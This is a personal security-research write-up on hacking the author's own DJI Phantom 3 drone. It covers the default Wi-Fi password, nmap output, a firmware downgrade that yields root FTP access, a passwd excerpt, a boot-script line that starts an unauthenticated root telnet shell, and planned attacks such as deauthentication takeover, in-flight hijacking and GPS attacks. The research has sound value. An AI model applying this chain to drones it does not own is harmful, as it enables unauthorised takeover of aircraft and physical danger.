Hacking the DJI Phantom 3
Finally, during Christmas time, I had some spare time to play with my flying beast; I’m speaking about trying to hack my DJI Phantom 3.
It was my first time that I operate with drones or similar embedded system and at the beginning I didn’t have any clue about how I could interact with it.
The Phantom 3 comes with an aircraft, controller and an Android/iOS app.
Let’s start from the beginning:
As a first step, I have analysed the protocols, the connection between the aircraft and the controller is done with Wi-Fi 5.725GHz – 5.825GHz (and not the Lightbridge protocol, for long range), while the connection between controller and mobile device is operating at 2.400GHz-2.483GHz, the controller is acting like an AP.
Wi-Fi encryption is WPA2 and the default SSID is derived from the MAC address of the remote controller: PHANTOM3_[6 last digits of MAC address]. The default associated password is: 12341234
Inside the network, I was able to find out these IP addresses:
- Controller: 192.168.1.1
- Aircraft: 192.168.1.2
- Camera: 192.168.1.3
- Phone (DJI GO App): 192.168.1.20
Interestingly, the camera is separated from the aircraft, I suppose because in that way, image feedback won’t interfere with the aircraft navigation.
Here the nmap result for every device:
Nmap scan report for 192.168.1.1 21/tcp open ftp syn-ack vsftpd 3.0.2 22/tcp closed ssh conn-refused 23/tcp closed telnet conn-refused 2345/tcp open landesk-rc syn-ack LANDesk remote management 5678/tcp closed rrac conn-refused Nmap scan report for 192.168.1.2 21/tcp open ftp syn-ack vsftpd 3.0.2 22/tcp filtered ssh no-response 23/tcp filtered telnet no-response 2345/tcp filtered unknown no-response 5678/tcp open tcpwrapped syn-ack Nmap scan report for 192.168.1.3 21/tcp open ftp syn-ack BusyBox ftpd (D-Link DCS-932L IP-Cam camera) | ftp-anon: Anonymous FTP login allowed (FTP code 230) | total 0 | drwxr--r-- 2 0 0 0 Dec 23 2016 DCIM | drwxr--r-- 6 0 0 0 Dec 23 2016 MISC |_drwxr--r-- 2 0 0 0 Dec 23 2016 System Volume Information 22/tcp open ssh syn-ack OpenSSH 6.2 (protocol 2.0) 23/tcp open telnet syn-ack BusyBox telnetd 2345/tcp filtered unknown no-response 5678/tcp filtered rrac no-response
How you can see from the above scan, some services draw my attention:
Since I didn’t have any passwords for these services I decided to give a look at the Android App (DJI GO) and surprisingly, I found these details while reversing it:
While the first file contains the root password for the FTP access to every device inside the network, the second file contains some areas where the drone cannot fly (no-fly zones/virtual fence) like: airports, stadiums, military bases, cities, etc.
Unfortunately, on the latest firmware (V01.07.0090), the root ftp access to the drone is chrooted and I wasn’t able to escape the /tmp directory, plus, Telnet and SSH access are disabled.
I tried to replace the firmware with a modified version but the firmware is signed and resilient to tampering.
Downgrading the firmware to its precedent version (V01.06.0080) result in an unrestricted root FTP access, so, I dumped the file system and started diving into it.
root:x:0:0:root:/root:/bin/ash daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false
The drone underlying system is a fork of OpenWRT 14.07 “Barrier Breaker, r2879, 14.07” built for “ar71xx/generic“, same version for the controller.
Root access to the aircraft is something hard to achieve because the root password is strong, I tried to crack it but it resists to some days of cracking (thanks to the Hacktive Security’s guys)
So, I decided to take another path, re-enabling the Telnet service. Searching inside the filesystem I found these files:
These script runs during the boot process, enabling the code on line 61 will start the telnet server
telnetd -l /bin/ash &
In that way, I managed to get root access to the aircraft and the controller underlying system:
- Check the rrac and the landesk-rc services for some cool exploit
- Check the device queue trying to de-authenticate mobile phone and perform the takeover
- Check the SDK to hijack an inflight drone
- GPS Attack